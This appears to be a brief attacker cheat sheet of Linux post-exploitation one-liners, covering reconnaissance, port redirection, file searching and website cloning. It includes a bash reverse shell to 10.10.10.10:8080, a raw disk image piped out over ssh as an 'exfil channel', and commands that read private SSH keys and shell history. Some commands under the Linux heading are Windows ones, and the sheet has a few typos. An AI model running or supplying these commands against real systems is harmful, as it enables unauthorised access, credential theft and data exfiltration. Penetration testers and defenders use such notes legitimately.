Linux Post Exploitation Discovery

Identify current user ID and privileges
Identify network connections (for lateral movement)
Identify Running processes
Identify Chron jobs/scheduled tasks
Identify if Active Directory environment then identify users/groups/computers if in cloud or on-prem
If not AD, then find applications, firewalls, AV

whoami /priv netstat -na | findstr "ESTABLISHED" or "WAITING" arp -a systeminfo | findstr "Domain"

Linux Exploits

Redirect IPv6 listening TCP port to localhost IPv4.

IPV6ADDR=fc00:660:0:1::46
&& PORT=110 && socat
TCP-LISTEN:$PORT,reuseaddr,
fork TCP6:[$IPV6ADDR]:$POR

Find Juicy Stuff in the File System

 find /PATH/TO/DIRECTORY
-name "FILE-FILTER" -type
f -exec grep -i "STRING"
{} \; -print 2>/dev/null

Find public ip

curl -4 icanhazip.com

Make output easier to read

alias ccat='pygmentize
-O bg=dark,style=colorful'

Encrypted Exfil channel

dd if=/dev/rdisk0s1s2
bs=65536 conv=noerror,sync
| ssh -C user@10.10.10.10
"cat >/tmp/image.dd"

Check service every second

while (true); do nc -vv
-z -w3 10.10.10.10 80 >
/dev/null && echo -e
"Service is up"; sleep 1;
done

Website Cloner

wget -r -nH $URL

Type “gah” after you forgot to use sudo, and it’ll sudo your most recent command.

alias gah='sudo $(history
-p \!\!)'

Create a reverse shell back to a given IP address and port.

bash -i >&
/dev/tcp/10.10.10.10/8080
0>&1

Encode or decode base64 information.

echo 'Hello, World!' |
base64

echo
'SGVsbG8sIFdvcmxkIQo=' |
base64 -d

cat ~/.bash_history
cat ~/.ssh/config
cat ~/.ssh/id_rsa
cat ~/.ssh/known_hosts

Last updated 1 year ago